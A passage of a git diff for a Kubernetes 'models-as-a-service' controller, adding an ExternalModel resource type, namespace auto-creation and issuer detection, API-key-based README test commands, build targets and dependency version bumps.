`MaaSAuthPolicy/premium-simulator-access` (group: `premium-user`) and `MaaSSubscription/premium-simulator-subscription` (1000 tokens/min) in `models-as-a-service` Replace `free-user` and `premium-user` in the example CRs with groups from your identity provider.
@@ -281,7 +285,7 @@ Then verify: ```bash # Check CRs -kubectl get maasmodelref -n opendatahub +kubectl get maasmodelref -n llm kubectl get maasauthpolicy,maassubscription -n models-as-a-service # Check generated Kuadrant policies @@ -289,22 +293,29 @@ kubectl get authpolicy,tokenratelimitpolicy -n llm # Test inference (set GATEWAY_HOST and TOKEN once) GATEWAY_HOST="maas.$(kubectl get ingresses.config.openshift.io cluster -o jsonpath='{.spec.domain}')" +MAAS_API="https://${GATEWAY_HOST}/maas-api" TOKEN=$(oc whoami -t) -# Regular model: 401 without auth, 200 with auth (user must be in free-user) +# Regular tier: log in as a user in free-user, then mint a key for simulator-subscription +FREE_API_KEY=$(curl -sSk -H "Authorization: Bearer $TOKEN" -H "Content-Type: application/json" \ + -X POST -d '{"name":"readme-free","subscription":"simulator-subscription"}' \ + "${MAAS_API}/v1/api-keys" | jq -r .key) + curl -sSk -o /dev/null -w "%{http_code}\n" "https://${GATEWAY_HOST}/llm/facebook-opt-125m-simulated/v1/chat/completions" \ -H "Content-Type: application/json" -d '{"model":"facebook/opt-125m","messages":[{"role":"user","content":"Hi"}],"max_tokens":5}' curl -sSk -o /dev/null -w "%{http_code}\n" "https://${GATEWAY_HOST}/llm/facebook-opt-125m-simulated/v1/chat/completions" \ - -H "Authorization: Bearer $TOKEN" \ - -H "x-maas-subscription: simulator-subscription" \ + -H "Authorization: Bearer $FREE_API_KEY" \ -H "Content-Type: application/json" -d '{"model":"facebook/opt-125m","messages":[{"role":"user","content":"Hi"}],"max_tokens":5}' -# Premium model: 401 without auth, 200 with auth (user must be in premium-user) +# Premium tier: log in as a user in premium-user, mint a key for premium-simulator-subscription, then call the premium route +PREMIUM_API_KEY=$(curl -sSk -H "Authorization: Bearer $TOKEN" -H "Content-Type: application/json" \ + -X POST -d '{"name":"readme-premium","subscription":"premium-simulator-subscription"}' \ + "${MAAS_API}/v1/api-keys" | jq -r .key) + 
curl -sSk -o /dev/null -w "%{http_code}\n" "https://${GATEWAY_HOST}/llm/premium-simulated-simulated-premium/v1/chat/completions" \ -H "Content-Type: application/json" -d '{"model":"facebook/opt-125m","messages":[{"role":"user","content":"Hi"}],"max_tokens":5}' curl -sSk -o /dev/null -w "%{http_code}\n" "https://${GATEWAY_HOST}/llm/premium-simulated-simulated-premium/v1/chat/completions" \ - -H "Authorization: Bearer $TOKEN" \ - -H "x-maas-subscription: premium-simulator-subscription" \ + -H "Authorization: Bearer $PREMIUM_API_KEY" \ -H "Content-Type: application/json" -d '{"model":"facebook/opt-125m","messages":[{"role":"user","content":"Hi"}],"max_tokens":5}' ``` diff --git a/maas-controller/api/maas/v1alpha1/externalmodel_types.go b/maas-controller/api/maas/v1alpha1/externalmodel_types.go new file mode 100644 index 000000000..3f58053b7 --- /dev/null +++ b/maas-controller/api/maas/v1alpha1/externalmodel_types.go @@ -0,0 +1,86 @@ +/* +Copyright 2025. + +Licensed under the Apache License, Version 2.0 (the "License"); +you may not use this file except in compliance with the License. +You may obtain a copy of the License at + + http://www.apache.org/licenses/LICENSE-2.0 + +Unless required by applicable law or agreed to in writing, software +distributed under the License is distributed on an "AS IS" BASIS, +WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +See the License for the specific language governing permissions and +limitations under the License. +*/ + +package v1alpha1 + +import ( + metav1 "k8s.io/apimachinery/pkg/apis/meta/v1" +) + +// ExternalModelSpec defines the desired state of ExternalModel +type ExternalModelSpec struct { + // Provider identifies the API format and auth type for the external model. + // e.g. "openai", "anthropic". + // +kubebuilder:validation:Required + // +kubebuilder:validation:MaxLength=63 + Provider string `json:"provider"` + + // Endpoint is the FQDN of the external provider (no scheme or path). + // e.g. 
"api.openai.com". + // This field is metadata for downstream consumers (e.g. BBR provider-resolver plugin) + // and is not used by the controller for endpoint derivation. + // +kubebuilder:validation:Required + // +kubebuilder:validation:MaxLength=253 + // +kubebuilder:validation:Pattern=`^[a-zA-Z0-9]([a-zA-Z0-9\-]*[a-zA-Z0-9])?(\.[a-zA-Z0-9]([a-zA-Z0-9\-]*[a-zA-Z0-9])?)*$` + Endpoint string `json:"endpoint"` + + // CredentialRef references a Kubernetes Secret containing the provider API key. + // The Secret must contain a data key "api-key" with the credential value. + // +kubebuilder:validation:Required + CredentialRef CredentialReference `json:"credentialRef"` +} + +// ExternalModelStatus defines the observed state of ExternalModel +type ExternalModelStatus struct { + // Phase represents the current phase of the external model + // +kubebuilder:validation:Enum=Pending;Ready;Failed + Phase string `json:"phase,omitempty"` + + // Conditions represent the latest available observations of the external model's state + // +optional + Conditions []metav1.Condition `json:"conditions,omitempty"` +} + +//+kubebuilder:object:root=true +//+kubebuilder:subresource:status +//+kubebuilder:printcolumn:name="Provider",type="string",JSONPath=".spec.provider" +//+kubebuilder:printcolumn:name="Endpoint",type="string",JSONPath=".spec.endpoint" +//+kubebuilder:printcolumn:name="Phase",type="string",JSONPath=".status.phase" +//+kubebuilder:printcolumn:name="Age",type="date",JSONPath=".metadata.creationTimestamp" + +// ExternalModel is the Schema for the externalmodels API. +// It defines an external LLM provider (e.g., OpenAI, Anthropic) that can be +// referenced by MaaSModelRef resources. 
+type ExternalModel struct { + metav1.TypeMeta `json:",inline"` + metav1.ObjectMeta `json:"metadata,omitempty"` + + Spec ExternalModelSpec `json:"spec,omitempty"` + Status ExternalModelStatus `json:"status,omitempty"` +} + +//+kubebuilder:object:root=true + +// ExternalModelList contains a list of ExternalModel +type ExternalModelList struct { + metav1.TypeMeta `json:",inline"` + metav1.ListMeta `json:"metadata,omitempty"` + Items []ExternalModel `json:"items"` +} + +func init() { + SchemeBuilder.Register(&ExternalModel{}, &ExternalModelList{}) +} diff --git a/maas-controller/api/maas/v1alpha1/maasmodelref_types.go b/maas-controller/api/maas/v1alpha1/maasmodelref_types.go index 1679e972f..b5ab63739 100644 --- a/maas-controller/api/maas/v1alpha1/maasmodelref_types.go +++ b/maas-controller/api/maas/v1alpha1/maasmodelref_types.go @@ -31,13 +31,29 @@ type MaaSModelSpec struct { EndpointOverride string `json:"endpointOverride,omitempty"` } -// ModelReference references a model endpoint in the same namespace +// CredentialReference references a Kubernetes Secret with provider API credentials. +// The Secret must be in the same namespace as the ExternalModel. +type CredentialReference struct { + // Name is the name of the Secret + // +kubebuilder:validation:MinLength=1 + // +kubebuilder:validation:MaxLength=253 + Name string `json:"name"` +} + +// ModelReference references a model endpoint in the same namespace. +// For kind=ExternalModel, the Name field references an ExternalModel CR in the same namespace. type ModelReference struct { - // Kind determines which fields are available + // Kind determines which backend handles this model reference. + // LLMInferenceService: references a KServe LLMInferenceService. + // ExternalModel: references an ExternalModel CR containing provider config. // +kubebuilder:validation:Enum=LLMInferenceService;ExternalModel Kind string `json:"kind"` - // Name is the name of the model resource + // Name is the name of the model resource. 
+ // For LLMInferenceService, this is the InferenceService name. + // For ExternalModel, this is the ExternalModel CR name. + // +kubebuilder:validation:MinLength=1 + // +kubebuilder:validation:MaxLength=253 Name string `json:"name"` } diff --git a/maas-controller/api/maas/v1alpha1/zz_generated.deepcopy.go b/maas-controller/api/maas/v1alpha1/zz_generated.deepcopy.go index 4b5f91bbd..683a6ae68 100644 --- a/maas-controller/api/maas/v1alpha1/zz_generated.deepcopy.go +++ b/maas-controller/api/maas/v1alpha1/zz_generated.deepcopy.go @@ -39,6 +39,118 @@ func (in *BillingRate) DeepCopy() *BillingRate { return out } +// DeepCopyInto is an autogenerated deepcopy function, copying the receiver, writing into out. in must be non-nil. +func (in *CredentialReference) DeepCopyInto(out *CredentialReference) { + *out = *in +} + +// DeepCopy is an autogenerated deepcopy function, copying the receiver, creating a new CredentialReference. +func (in *CredentialReference) DeepCopy() *CredentialReference { + if in == nil { + return nil + } + out := new(CredentialReference) + in.DeepCopyInto(out) + return out +} + +// DeepCopyInto is an autogenerated deepcopy function, copying the receiver, writing into out. in must be non-nil. +func (in *ExternalModel) DeepCopyInto(out *ExternalModel) { + *out = *in + out.TypeMeta = in.TypeMeta + in.ObjectMeta.DeepCopyInto(&out.ObjectMeta) + out.Spec = in.Spec + in.Status.DeepCopyInto(&out.Status) +} + +// DeepCopy is an autogenerated deepcopy function, copying the receiver, creating a new ExternalModel. +func (in *ExternalModel) DeepCopy() *ExternalModel { + if in == nil { + return nil + } + out := new(ExternalModel) + in.DeepCopyInto(out) + return out +} + +// DeepCopyObject is an autogenerated deepcopy function, copying the receiver, creating a new runtime.Object. 
+func (in *ExternalModel) DeepCopyObject() runtime.Object { + if c := in.DeepCopy(); c != nil { + return c + } + return nil +} + +// DeepCopyInto is an autogenerated deepcopy function, copying the receiver, writing into out. in must be non-nil. +func (in *ExternalModelList) DeepCopyInto(out *ExternalModelList) { + *out = *in + out.TypeMeta = in.TypeMeta + in.ListMeta.DeepCopyInto(&out.ListMeta) + if in.Items != nil { + in, out := &in.Items, &out.Items + *out = make([]ExternalModel, len(*in)) + for i := range *in { + (*in)[i].DeepCopyInto(&(*out)[i]) + } + } +} + +// DeepCopy is an autogenerated deepcopy function, copying the receiver, creating a new ExternalModelList. +func (in *ExternalModelList) DeepCopy() *ExternalModelList { + if in == nil { + return nil + } + out := new(ExternalModelList) + in.DeepCopyInto(out) + return out +} + +// DeepCopyObject is an autogenerated deepcopy function, copying the receiver, creating a new runtime.Object. +func (in *ExternalModelList) DeepCopyObject() runtime.Object { + if c := in.DeepCopy(); c != nil { + return c + } + return nil +} + +// DeepCopyInto is an autogenerated deepcopy function, copying the receiver, writing into out. in must be non-nil. +func (in *ExternalModelSpec) DeepCopyInto(out *ExternalModelSpec) { + *out = *in + out.CredentialRef = in.CredentialRef +} + +// DeepCopy is an autogenerated deepcopy function, copying the receiver, creating a new ExternalModelSpec. +func (in *ExternalModelSpec) DeepCopy() *ExternalModelSpec { + if in == nil { + return nil + } + out := new(ExternalModelSpec) + in.DeepCopyInto(out) + return out +} + +// DeepCopyInto is an autogenerated deepcopy function, copying the receiver, writing into out. in must be non-nil. 
+func (in *ExternalModelStatus) DeepCopyInto(out *ExternalModelStatus) { + *out = *in + if in.Conditions != nil { + in, out := &in.Conditions, &out.Conditions + *out = make([]v1.Condition, len(*in)) + for i := range *in { + (*in)[i].DeepCopyInto(&(*out)[i]) + } + } +} + +// DeepCopy is an autogenerated deepcopy function, copying the receiver, creating a new ExternalModelStatus. +func (in *ExternalModelStatus) DeepCopy() *ExternalModelStatus { + if in == nil { + return nil + } + out := new(ExternalModelStatus) + in.DeepCopyInto(out) + return out +} + // DeepCopyInto is an autogenerated deepcopy function, copying the receiver, writing into out. in must be non-nil. func (in *GroupReference) DeepCopyInto(out *GroupReference) { *out = *in diff --git a/maas-controller/cmd/manager/main.go b/maas-controller/cmd/manager/main.go index 2c284fc45..528da45c8 100644 --- a/maas-controller/cmd/manager/main.go +++ b/maas-controller/cmd/manager/main.go @@ -17,11 +17,22 @@ limitations under the License. package main import ( + "context" "flag" + "fmt" "os" + "time" + corev1 "k8s.io/api/core/v1" + "k8s.io/apimachinery/pkg/api/errors" + metav1 "k8s.io/apimachinery/pkg/apis/meta/v1" + "k8s.io/apimachinery/pkg/apis/meta/v1/unstructured" "k8s.io/apimachinery/pkg/runtime" + "k8s.io/apimachinery/pkg/runtime/schema" + "k8s.io/apimachinery/pkg/types" utilruntime "k8s.io/apimachinery/pkg/util/runtime" + "k8s.io/apimachinery/pkg/util/wait" + "k8s.io/client-go/kubernetes" clientgoscheme "k8s.io/client-go/kubernetes/scheme" ctrl "sigs.k8s.io/controller-runtime" "sigs.k8s.io/controller-runtime/pkg/cache" @@ -48,6 +59,86 @@ func init() { utilruntime.Must(maasv1alpha1.AddToScheme(scheme)) } +// ensureSubscriptionNamespaceExists checks whether the subscription namespace exists +// and creates it if missing. 
It checks for existence first so that the controller can +// start even when the service account lacks namespace-create permission (common in +// operator-managed deployments where the operator pre-creates the namespace). +// Permanent errors such as Forbidden are not retried. +func ensureSubscriptionNamespaceExists(ctx context.Context, namespace string) error { + cfg := ctrl.GetConfigOrDie() + clientset, err := kubernetes.NewForConfig(cfg) + if err != nil { + return fmt.Errorf("unable to create Kubernetes client: %w", err) + } + + _, err = clientset.CoreV1().Namespaces().Get(ctx, namespace, metav1.GetOptions{}) + if err == nil { + setupLog.Info("subscription namespace already exists", "namespace", namespace) + return nil + } + if !errors.IsNotFound(err) { + return fmt.Errorf("unable to check if namespace %q exists: %w", namespace, err) + } + + setupLog.Info("subscription namespace not found, attempting to create it", "namespace", namespace) + return wait.ExponentialBackoffWithContext(ctx, wait.Backoff{ + Steps: 5, + Duration: 1 * time.Second, + Factor: 2.0, + }, func(ctx context.Context) (bool, error) { + ns := &corev1.Namespace{ + ObjectMeta: metav1.ObjectMeta{ + Name: namespace, + Labels: map[string]string{ + "opendatahub.io/generated-namespace": "true", + }, + }, + } + + _, err := clientset.CoreV1().Namespaces().Create(ctx, ns, metav1.CreateOptions{}) + if err == nil || errors.IsAlreadyExists(err) { + setupLog.Info("subscription namespace ready", "namespace", namespace) + return true, nil + } + if errors.IsForbidden(err) { + return false, fmt.Errorf("service account lacks permission to create namespace %q — "+ + "either pre-create the namespace or grant 'create' on namespaces to the controller service account: %w", + namespace, err) + } + setupLog.Info("retrying namespace creation", "namespace", namespace, "error", err) + return false, nil // transient error, retry + }) +} + +// getClusterServiceAccountIssuer fetches the cluster's service account issuer from 
OpenShift/ROSA configuration. +// Returns empty string if not found or not running on OpenShift/ROSA. +// Uses client.Reader (not client.Client) so it can be called before the manager cache starts. +func getClusterServiceAccountIssuer(c client.Reader) (string, error) { + // Try to fetch the OpenShift Authentication config resource + // This works on OpenShift/ROSA but not on vanilla Kubernetes + authConfig := &unstructured.Unstructured{} + authConfig.SetGroupVersionKind(schema.GroupVersionKind{ + Group: "config.openshift.io", + Version: "v1", + Kind: "Authentication", + }) + + if err := c.Get(context.Background(), types.NamespacedName{Name: "cluster"}, authConfig); err != nil { + return "", err + } + + // Extract spec.serviceAccountIssuer + issuer, found, err := unstructured.NestedString(authConfig.Object, "spec", "serviceAccountIssuer") + if err != nil { + return "", err + } + if !found || issuer == "" { + return "", nil + } + + return issuer, nil +} + func main() { var metricsAddr string var enableLeaderElection bool @@ -74,6 +165,12 @@ func main() { ctrl.SetLogger(zap.New(zap.UseFlagOptions(&opts))) + // Ensure subscription namespace exists before starting controllers + if err := ensureSubscriptionNamespaceExists(context.Background(), maasSubscriptionNamespace); err != nil { + setupLog.Error(err, "unable to ensure subscription namespace exists", "namespace", maasSubscriptionNamespace) + os.Exit(1) + } + setupLog.Info("watching namespace for MaaS AuthPolicy and MaaSSubscription", "namespace", maasSubscriptionNamespace) cacheOpts := cache.Options{ ByObject: map[client.Object]cache.ByObject{ @@ -95,6 +192,17 @@ func main() { os.Exit(1) } + // Auto-detect cluster audience from OpenShift/ROSA if using default value + // Use GetAPIReader() instead of GetClient() because the cache hasn't started yet + if clusterAudience == "https://kubernetes.default.svc" { + if detectedAudience, err := getClusterServiceAccountIssuer(mgr.GetAPIReader()); err == nil && detectedAudience 
!= "" { + setupLog.Info("auto-detected cluster service account issuer", "audience", detectedAudience) + clusterAudience = detectedAudience + } else if err != nil { + setupLog.Info("unable to auto-detect cluster service account issuer, using default", "error", err, "default", clusterAudience) + } + } + if err := (&maas.MaaSModelRefReconciler{ Client: mgr.GetClient(), Scheme: mgr.GetScheme(), diff --git a/maas-controller/container.mk b/maas-controller/container.mk new file mode 100644 index 000000000..5da4bf6c4 --- /dev/null +++ b/maas-controller/container.mk @@ -0,0 +1,34 @@ +## Container image configuration and targets + +CONTAINER_ENGINE ?= podman +REPO ?= quay.io/opendatahub/maas-controller +TAG ?= latest +FULL_IMAGE ?= $(REPO):$(TAG) + +DOCKER_BUILD_ARGS := --build-arg CGO_ENABLED=$(CGO_ENABLED) +ifdef GOEXPERIMENT + DOCKER_BUILD_ARGS += --build-arg GOEXPERIMENT=$(GOEXPERIMENT) +endif + +##@ Build + +.PHONY: build-image +build-image: ## Build container image (use REPO= and TAG= to specify image) + @echo "Building container image $(FULL_IMAGE)..." + $(CONTAINER_ENGINE) build $(DOCKER_BUILD_ARGS) $(CONTAINER_ENGINE_EXTRA_FLAGS) -t "$(FULL_IMAGE)" . + @echo "Container image $(FULL_IMAGE) built successfully" + +.PHONY: build-image-konflux +build-image-konflux: ## Build container image with Dockerfile.konflux + @echo "Building container image $(FULL_IMAGE) using Dockerfile.konflux..." + $(CONTAINER_ENGINE) build $(DOCKER_BUILD_ARGS) $(CONTAINER_ENGINE_EXTRA_FLAGS) -f Dockerfile.konflux -t "$(FULL_IMAGE)" . + @echo "Container image $(FULL_IMAGE) built successfully" + +.PHONY: push-image +push-image: ## Push container image (use REPO= and TAG= to specify image) + @echo "Pushing container image $(FULL_IMAGE)..." 
+ @$(CONTAINER_ENGINE) push "$(FULL_IMAGE)" + @echo "Container image $(FULL_IMAGE) pushed successfully" + +.PHONY: build-push-image +build-push-image: build-image push-image ## Build and push container image diff --git a/maas-controller/docs/old-vs-new-flow.md b/maas-controller/docs/old-vs-new-flow.md index 734237aef..a26d39dc3 100644 --- a/maas-controller/docs/old-vs-new-flow.md +++ b/maas-controller/docs/old-vs-new-flow.md @@ -98,7 +98,7 @@ Model Endpoint | Resource | Namespace | Created by | Purpose | |----------|-----------|------------|---------| -| MaaSModelRef | opendatahub | User/admin | Registers a model with MaaS | +| MaaSModelRef | Same as model (e.g. `llm`) | User/admin | Registers a model with MaaS | | MaaSAuthPolicy | models-as-a-service | User/admin | Defines who (groups) can access which models | | MaaSSubscription | models-as-a-service | User/admin | Defines per-model token rate limits for owner groups | | AuthPolicy (generated) | llm | maas-controller | Per-model auth, one per (MaaSAuthPolicy, model) pair | @@ -154,3 +154,13 @@ To move from old flow to new flow on an existing cluster: - Create a `MaaSSubscription` CR with the token rate limits 3. The old `gateway-token-rate-limits` and `tier-to-group-mapping` ConfigMap can be removed 4. The MaaS API is still needed for token minting and model listing (unchanged) + +**For detailed step-by-step migration instructions, see [Migration Guide: Tier-Based to Subscription Model](../../docs/content/migration/tier-to-subscription.md)**.
+ +The migration guide includes: +- Zero-downtime migration strategy +- Automated migration script (`scripts/migrate-tier-to-subscription.sh`) +- Conversion worksheet +- Rollback procedures +- Troubleshooting common issues +- ODH Model Controller considerations diff --git a/maas-controller/examples/maas-model.yaml b/maas-controller/examples/maas-model.yaml deleted file mode 100644 index b23d0e66d..000000000 --- a/maas-controller/examples/maas-model.yaml +++ /dev/null @@ -1,13 +0,0 @@ -# MaaSModelRef that registers the simulator LLMInferenceService. -# The LLMIS name must match the deployed resource (e.g. from docs/samples/models/simulator: -# namePrefix facebook-opt-125m- + name simulated -> facebook-opt-125m-simulated in namespace llm). -apiVersion: maas.opendatahub.io/v1alpha1 -kind: MaaSModelRef -metadata: - name: facebook-opt-125m-simulated - namespace: opendatahub -spec: - modelRef: - kind: LLMInferenceService - name: facebook-opt-125m-simulated - namespace: llm diff --git a/maas-controller/go.mod b/maas-controller/go.mod index 9b360f139..356764b74 100644 --- a/maas-controller/go.mod +++ b/maas-controller/go.mod @@ -14,29 +14,30 @@ require ( ) require ( - cel.dev/expr v0.19.2 // indirect + cel.dev/expr v0.25.1 // indirect cloud.google.com/go v0.118.3 // indirect cloud.google.com/go/auth v0.15.0 // indirect cloud.google.com/go/auth/oauth2adapt v0.2.8 // indirect - cloud.google.com/go/compute/metadata v0.6.0 // indirect + cloud.google.com/go/compute/metadata v0.9.0 // indirect cloud.google.com/go/iam v1.4.1 // indirect cloud.google.com/go/monitoring v1.24.1 // indirect cloud.google.com/go/storage v1.51.0 // indirect - github.com/GoogleCloudPlatform/opentelemetry-operations-go/detectors/gcp v1.25.0 // indirect + github.com/GoogleCloudPlatform/opentelemetry-operations-go/detectors/gcp v1.30.0 // indirect github.com/GoogleCloudPlatform/opentelemetry-operations-go/exporter/metric v0.51.0 // indirect 
github.com/GoogleCloudPlatform/opentelemetry-operations-go/internal/resourcemapping v0.51.0 // indirect github.com/aws/aws-sdk-go v1.55.6 // indirect github.com/beorn7/perks v1.0.1 // indirect github.com/cespare/xxhash/v2 v2.3.0 // indirect - github.com/cncf/xds/go v0.0.0-20250121191232-2f005788dc42 // indirect + github.com/cncf/xds/go v0.0.0-20251210132809-ee656c7534f5 // indirect github.com/davecgh/go-spew v1.1.2-0.20180830191138-d8f796af33cc // indirect github.com/emicklei/go-restful/v3 v3.12.2 // indirect - github.com/envoyproxy/go-control-plane/envoy v1.32.4 // indirect - github.com/envoyproxy/protoc-gen-validate v1.2.1 // indirect + github.com/envoyproxy/go-control-plane/envoy v1.36.0 // indirect + github.com/envoyproxy/protoc-gen-validate v1.3.0 // indirect github.com/evanphx/json-patch/v5 v5.9.11 // indirect github.com/felixge/httpsnoop v1.0.4 // indirect github.com/fsnotify/fsnotify v1.9.0 // indirect github.com/fxamacker/cbor/v2 v2.8.0 // indirect + github.com/go-jose/go-jose/v4 v4.1.3 // indirect github.com/go-logr/stdr v1.2.2 // indirect github.com/go-logr/zapr v1.3.0 // indirect github.com/go-openapi/jsonpointer v0.21.1 // indirect @@ -68,9 +69,10 @@ require ( github.com/prometheus/common v0.64.0 // indirect github.com/prometheus/procfs v0.16.1 // indirect github.com/spf13/pflag v1.0.6 // indirect + github.com/spiffe/go-spiffe/v2 v2.6.0 // indirect github.com/x448/float16 v0.8.4 // indirect go.opentelemetry.io/auto/sdk v1.2.1 // indirect - go.opentelemetry.io/contrib/detectors/gcp v1.34.0 // indirect + go.opentelemetry.io/contrib/detectors/gcp v1.39.0 // indirect go.opentelemetry.io/contrib/instrumentation/google.golang.org/grpc/otelgrpc v0.59.0 // indirect go.opentelemetry.io/contrib/instrumentation/net/http/otelhttp v0.60.0 // indirect go.opentelemetry.io/otel v1.40.0 // indirect @@ -80,21 +82,21 @@ require ( go.opentelemetry.io/otel/trace v1.40.0 // indirect go.uber.org/multierr v1.11.0 // indirect go.uber.org/zap v1.27.0 // indirect - 
golang.org/x/crypto v0.39.0 // indirect - golang.org/x/net v0.41.0 // indirect - golang.org/x/oauth2 v0.30.0 // indirect - golang.org/x/sync v0.15.0 // indirect + golang.org/x/crypto v0.46.0 // indirect + golang.org/x/net v0.48.0 // indirect + golang.org/x/oauth2 v0.34.0 // indirect + golang.org/x/sync v0.19.0 // indirect golang.org/x/sys v0.40.0 // indirect - golang.org/x/term v0.32.0 // indirect - golang.org/x/text v0.26.0 // indirect + golang.org/x/term v0.38.0 // indirect + golang.org/x/text v0.32.0 // indirect golang.org/x/time v0.12.0 // indirect gomodules.xyz/jsonpatch/v2 v2.5.0 // indirect google.golang.org/api v0.228.0 // indirect google.golang.org/genproto v0.0.0-20250303144028-a0af3efb3deb // indirect - google.golang.org/genproto/googleapis/api v0.0.0-20250303144028-a0af3efb3deb // indirect - google.golang.org/genproto/googleapis/rpc v0.0.0-20250313205543-e70fdf4c4cb4 // indirect - google.golang.org/grpc v1.71.1 // indirect - google.golang.org/protobuf v1.36.6 // indirect + google.golang.org/genproto/googleapis/api v0.0.0-20251202230838-ff82c1b0f217 // indirect + google.golang.org/genproto/googleapis/rpc v0.0.0-20251202230838-ff82c1b0f217 // indirect + google.golang.org/grpc v1.79.3 // indirect + google.golang.org/protobuf v1.36.10 // indirect gopkg.in/evanphx/json-patch.v4 v4.12.0 // indirect gopkg.in/go-playground/validator.v9 v9.31.0 // indirect gopkg.in/inf.v0 v0.9.1 // indirect diff --git a/maas-controller/go.sum b/maas-controller/go.sum index e3660ea1f..2d5e2a7bd 100644 --- a/maas-controller/go.sum +++ b/maas-controller/go.sum @@ -1,5 +1,5 @@ -cel.dev/expr v0.19.2 h1:V354PbqIXr9IQdwy4SYA4xa0HXaWq1BUPAGzugBY5V4= -cel.dev/expr v0.19.2/go.mod h1:MrpN08Q+lEBs+bGYdLxxHkZoUSsCp0nSKTs0nTymJgw= +cel.dev/expr v0.25.1 h1:1KrZg61W6TWSxuNZ37Xy49ps13NUovb66QLprthtwi4= +cel.dev/expr v0.25.1/go.mod h1:hrXvqGP6G6gyx8UAHSHJ5RGk//1Oj5nXQ2NI02Nrsg4= cloud.google.com/go v0.26.0/go.mod h1:aQUYkXzVsufM+DwF1aE+0xfcU+56JwCaLick0ClmMTw= cloud.google.com/go v0.34.0/go.mod 
h1:aQUYkXzVsufM+DwF1aE+0xfcU+56JwCaLick0ClmMTw= cloud.google.com/go v0.38.0/go.mod h1:990N+gfupTy94rShfmMCWGDn0LpTmnzTp2qbd1dvSRU= @@ -13,8 +13,8 @@ cloud.google.com/go/auth v0.15.0/go.mod h1:WJDGqZ1o9E9wKIL+IwStfyn/+s59zl4Bi+1KQ cloud.google.com/go/auth/oauth2adapt v0.2.8 h1:keo8NaayQZ6wimpNSmW5OPc283g65QNIiLpZnkHRbnc= cloud.google.com/go/auth/oauth2adapt v0.2.8/go.mod h1:XQ9y31RkqZCcwJWNSx2Xvric3RrU88hAYYbjDWYDL+c= cloud.google.com/go/bigquery v1.0.1/go.mod h1:i/xbL2UlR5RvWAURpBYZTtm/cXjCha9lbfbpx4poX+o= -cloud.google.com/go/compute/metadata v0.6.0 h1:A6hENjEsCDtC1k8byVsgwvVcioamEHvZ4j01OwKxG9I= -cloud.google.com/go/compute/metadata v0.6.0/go.mod h1:FjyFAW1MW0C203CEOMDTu3Dk1FlqW3Rga40jzHL4hfg= +cloud.google.com/go/compute/metadata v0.9.0 h1:pDUj4QMoPejqq20dK0Pg2N4yG9zIkYGdBtwLoEkH9Zs= +cloud.google.com/go/compute/metadata v0.9.0/go.mod h1:E0bWwX5wTnLPedCKqk3pJmVgCBSM6qQI1yTBdEb3C10= cloud.google.com/go/datastore v1.0.0/go.mod h1:LXYbyblFSglQ5pkeyhO+Qmw7ukd3C+pD7TKLgZqpHYE= cloud.google.com/go/iam v1.4.1 h1:cFC25Nv+u5BkTR/BT1tXdoF2daiVbZ1RLx2eqfQ9RMM= cloud.google.com/go/iam v1.4.1/go.mod h1:2vUEJpUG3Q9p2UdsyksaKpDzlwOrnMzS30isdReIcLM= @@ -30,8 +30,8 @@ cloud.google.com/go/trace v1.11.3 h1:c+I4YFjxRQjvAhRmSsmjpASUKq88chOX854ied0K/pE cloud.google.com/go/trace v1.11.3/go.mod h1:pt7zCYiDSQjC9Y2oqCsh9jF4GStB/hmjrYLsxRR27q8= github.com/BurntSushi/toml v0.3.1/go.mod h1:xHWCNGjB5oqiDr8zfno3MHue2Ht5sIBksp03qcyfWMU= github.com/BurntSushi/xgb v0.0.0-20160522181843-27f122750802/go.mod h1:IVnqGOEym/WlBOVXweHU+Q+/VP0lqqI8lqeDx9IjBqo= -github.com/GoogleCloudPlatform/opentelemetry-operations-go/detectors/gcp v1.25.0 h1:3c8yed4lgqTt+oTQ+JNMDo+F4xprBf+O/il4ZC0nRLw= -github.com/GoogleCloudPlatform/opentelemetry-operations-go/detectors/gcp v1.25.0/go.mod h1:obipzmGjfSjam60XLwGfqUkJsfiheAl+TUjG+4yzyPM= +github.com/GoogleCloudPlatform/opentelemetry-operations-go/detectors/gcp v1.30.0 h1:sBEjpZlNHzK1voKq9695PJSX2o5NEXl7/OL3coiIY0c= 
+github.com/GoogleCloudPlatform/opentelemetry-operations-go/detectors/gcp v1.30.0/go.mod h1:P4WPRUkOhJC13W//jWpyfJNDAIpvRbAUIYLX/4jtlE0= github.com/GoogleCloudPlatform/opentelemetry-operations-go/exporter/metric v0.51.0 h1:fYE9p3esPxA/C0rQ0AHhP0drtPXDRhaWiwg1DPqO7IU= github.com/GoogleCloudPlatform/opentelemetry-operations-go/exporter/metric v0.51.0/go.mod h1:BnBReJLvVYx2CS/UHOgVz2BXKXD9wsQPxZug20nZhd0= github.com/GoogleCloudPlatform/opentelemetry-operations-go/internal/cloudmock v0.51.0 h1:OqVGm6Ei3x5+yZmSJG1Mh2NwHvpVmZ08CB5qJhT9Nuk= @@ -47,22 +47,22 @@ github.com/blendle/zapdriver v1.3.1/go.mod h1:mdXfREi6u5MArG4j9fewC+FGnXaBR+T4Ox github.com/cespare/xxhash/v2 v2.3.0 h1:UL815xU9SqsFlibzuggzjXhog7bL6oX9BbNZnL2UFvs= github.com/cespare/xxhash/v2 v2.3.0/go.mod h1:VGX0DQ3Q6kWi7AoAeZDth3/j3BFtOZR5XLFGgcrjCOs= github.com/client9/misspell v0.3.4/go.mod h1:qj6jICC3Q7zFZvVWo7KLAzC3yx5G7kyvSDkc90ppPyw= -github.com/cncf/xds/go v0.0.0-20250121191232-2f005788dc42 h1:Om6kYQYDUk5wWbT0t0q6pvyM49i9XZAv9dDrkDA7gjk= -github.com/cncf/xds/go v0.0.0-20250121191232-2f005788dc42/go.mod h1:W+zGtBO5Y1IgJhy4+A9GOqVhqLpfZi+vwmdNXUehLA8= +github.com/cncf/xds/go v0.0.0-20251210132809-ee656c7534f5 h1:6xNmx7iTtyBRev0+D/Tv1FZd4SCg8axKApyNyRsAt/w= +github.com/cncf/xds/go v0.0.0-20251210132809-ee656c7534f5/go.mod h1:KdCmV+x/BuvyMxRnYBlmVaq4OLiKW6iRQfvC62cvdkI= github.com/davecgh/go-spew v1.1.0/go.mod h1:J7Y8YcW2NihsgmVo/mv3lAwl/skON4iLHjSsI+c5H38= github.com/davecgh/go-spew v1.1.1/go.mod h1:J7Y8YcW2NihsgmVo/mv3lAwl/skON4iLHjSsI+c5H38= github.com/davecgh/go-spew v1.1.2-0.20180830191138-d8f796af33cc h1:U9qPSI2PIWSS1VwoXQT9A3Wy9MM3WgvqSxFWenqJduM= github.com/davecgh/go-spew v1.1.2-0.20180830191138-d8f796af33cc/go.mod 